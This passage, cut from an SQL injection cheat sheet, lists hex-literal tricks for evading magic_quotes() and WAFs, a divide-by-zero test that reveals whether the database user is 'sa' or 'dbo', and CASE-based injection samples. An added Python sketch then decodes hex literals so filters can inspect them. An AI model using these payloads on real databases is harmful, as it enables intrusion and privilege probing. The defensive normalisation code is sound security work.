SELECT 0x50 + 0x45 (this is an integer now!) (M)
SELECT 0x5045 (this is not an integer; it will be a string from hex) (M)

This is very useful for bypassing magic_quotes() and similar filters, or even WAFs.

This will throw a divide-by-zero error if the currently logged-in user is not "sa" or "dbo":
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)

If Statement SQL Injection Attack Samples
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END
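On the defensive side, the hex-literal point above means a filter that matches on quoted or plain text has to decode `0x...` values before it inspects them. The sketch below is an added example, not part of the original cheat sheet; the blocked term, the sample values and the function names are constructed for illustration.

```python
import re

# MySQL reads 0x<hex> as a byte string in string context (lowercase "0x" only;
# an odd digit count is treated as having a leading zero), so the text it
# carries never appears in quotes in the request.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")

def _decode(digits: str) -> str:
    """Decode the hex digits of one literal to the text MySQL would see."""
    if len(digits) % 2:
        digits = "0" + digits
    return bytes.fromhex(digits).decode("latin-1")

def normalise(value: str) -> str:
    """Rewrite each hex literal as the quoted string it stands for."""
    return HEX_LITERAL.sub(lambda m: "'" + _decode(m.group(1)) + "'", value)

def hits(value: str, blocked_terms) -> dict:
    """Report blocked terms found in the raw value, and those found only
    after hex literals are decoded (the case a text-matching filter misses)."""
    raw = value.lower()
    normalised = normalise(value)
    decoded = normalised.lower()
    return {
        "raw": [t for t in blocked_terms if t in raw],
        "decoded_only": [t for t in blocked_terms if t in decoded and t not in raw],
        "normalised": normalised,
    }

# Constructed sample parameter values, not taken from the page
# (except 0x5045, which is the page's own literal).
SAMPLES = [
    "42",
    "0x5045",        # string "PE" in string context
    "0x61646d696e",  # hex for the constructed blocked term "admin"
    "admin",
]
BLOCKED = ("admin",)  # hypothetical rule content

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, hits(sample, BLOCKED))
```

Normalising for inspection does not replace parameterized queries; it only keeps text-matching rules from being blind to the encoded form.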